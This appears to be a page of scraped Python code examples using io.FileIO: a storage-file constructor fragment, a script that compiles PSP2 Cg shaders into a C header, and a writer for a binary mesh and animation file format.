                    self.path = filePath
                    self.file = io.BufferedRandom(io.FileIO(self.path, ioMode),
                                                  buffer_size=pageSize)
                    self.binrepr = Struct("H" + str(FileId.binrepr.size) +
                                          "s" + str(len(self.path)) + "s")
                    self.freePages = set()

                    page = self.pageClass()(pageId=self.pageId(0),
                                            buffer=bytes(self.pageSize()),
                                            schema=self.schema())
                    self.pageHdrSize = page.header.headerSize()

                    if initFreePages:
                        self.initializeFreePages()

                    if initHeader:
                        self.file.seek(0)
                        self.header.toFile(self.file)
                        self.file.flush()

                else:
                    raise ValueError(
                        "No valid header available for storage file")
            else:
                raise ValueError(
                    "No file id or path specified in storage file constructor")
Ejemplo n.º 29
0
for name in shaders:
    if "_f" in name:
        profile = "sce_fp_psp2"
    else:
        profile = "sce_vp_psp2"
    cmd = "psp2cgc -profile %s ..\external\src\inline_gles2\shaders\%s.cg -o %s.bin" % (
        profile, name, name)
    print(cmd)
    os.system(cmd)

out = open("../external/src/cg_shaders.h", "wb")
out.write("// shaders compiled by build_shaders.py\n\n")

for name in shaders:
    f = io.FileIO("%s.bin" % (name), "rb")
    z = f.read()
    out.write("static const uint8_t cg_shaderbin_%s[] = {" % (name))
    for byte in z:
        out.write("0x%02x," % (ord(byte)))
    out.write("};\n")

out.write("\n")
"""

out.write("static const char * const cg_shader_names[] = {")
for name in shaders:
  out.write('"%s", ' % (name))
out.write("NULL};\n")
out.write("\n")
out.write("\n")
Ejemplo n.º 30
0
    def write(self, fileName):
        try:
            with io.FileIO(fileName, "wb") as out_file:

                formatName = "SMA"
                buffer1 = formatName.encode(encoding='UTF-8', errors='strict')
                if not buffer1:
                    buffer1 = bytes()
                out_file.write(pack('<{}s'.format(8), buffer1))

                version = 1
                out_file.write(pack('<H', version))

                buffer = self.name.encode(encoding='UTF-8', errors='strict')
                if not buffer:
                    buffer = bytes()
                out_file.write(pack('<{}s'.format(32), buffer))

                out_file.write(pack('<H', len(self.vertices)))
                for v in self.vertices:
                    out_file.write(pack('<f', v))

                out_file.write(pack('<H', len(self.normals)))
                for n in self.normals:
                    out_file.write(pack('<f', n))

                out_file.write(pack('<H', len(self.texcoords)))
                for uv in self.texcoords:
                    out_file.write(pack('<f', uv))

                self.textures.write(out_file)

                print('Saving bones')
                out_file.write(pack('<H', len(self.bones)))
                for bone in self.bones:
                    out_file.write(pack('<h', bone.parent_idx))
                    out_file.write(pack('<f', bone.rot_x))
                    out_file.write(pack('<f', bone.rot_y))
                    out_file.write(pack('<f', bone.rot_z))
                    out_file.write(pack('<f', bone.pos_x))
                    out_file.write(pack('<f', bone.pos_y))
                    out_file.write(pack('<f', bone.pos_z))
                    #bone.print()

                out_file.write(pack('<H', len(self.vertex_weights)))
                for vert_w in self.vertex_weights:
                    vert_w.write(out_file)

                out_file.write(pack('<H', len(self.animations)))
                for a in self.animations:
                    abuffer = a.name.encode(encoding='UTF-8', errors='strict')
                    if not abuffer:
                        abuffer = bytes()
                    out_file.write(pack('<{}s'.format(64), abuffer))
                    out_file.write(pack('<H', a.numKeyframes))
                    #print("Num keyframes", a.numKeyframes)
                    # print(a.name)
                    for kf in a.keyframe:
                        #print("kf index", kf.index)
                        out_file.write(pack('<H', kf.index))
                        for idx, rot in enumerate(kf.rotations):
                            out_file.write(pack('<f', rot.x))
                            out_file.write(pack('<f', rot.y))
                            out_file.write(pack('<f', rot.z))
                            out_file.write(pack('<f', kf.positions[idx].x))
                            out_file.write(pack('<f', kf.positions[idx].y))
                            out_file.write(pack('<f', kf.positions[idx].z))

                out_file.flush()
                out_file.close()
        finally:
            pass
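
A tiny round-trip sketch for the little-endian struct formats used throughout write(); the values are illustrative.

from struct import pack, unpack

record = pack('<H', 3) + pack('<f', 1.5) + pack('<h', -1)
count, = unpack('<H', record[:2])    # 3   (unsigned 16-bit length prefix)
value, = unpack('<f', record[2:6])   # 1.5 (32-bit float payload)
parent, = unpack('<h', record[6:8])  # -1  (signed 16-bit parent index)
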